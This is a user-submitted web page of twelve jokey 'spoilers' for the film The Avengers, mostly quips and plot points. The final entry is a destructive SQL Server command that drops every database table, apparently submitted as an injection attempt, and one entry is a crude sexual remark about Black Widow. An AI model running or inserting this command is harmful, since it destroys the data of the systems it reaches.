The Avengers cover
The Avengers cover

12 spoilers for the movie The Avengers

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Bunch of cosplayers save the day, go for Shawerma after.

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Tony Stark throws sass all over the place and becomes an astronaut.

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Agent Coulson is fatally wounded by Loki. Nick Fury uses Coulson's death to motivate the Avengers.

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Hulk controls smash. Iron man saves world.

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Black Widow looks sexy AF and not a single one of these heros fuck her.

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How boring is your life if you actually look at this site?

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It has superheroes bruh

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Agent Colson gets stabbed by Loki when he tries to save Thor; Black Widow and Hawkeye do jack shit.

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Coulson dies so he can have his own TV show.

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After saving everyone in the first movie, Stark almost kills everyone.

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Just go and watch the movie

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EXEC sp_MSforeachtable @command1 = "DROP TABLE ?"

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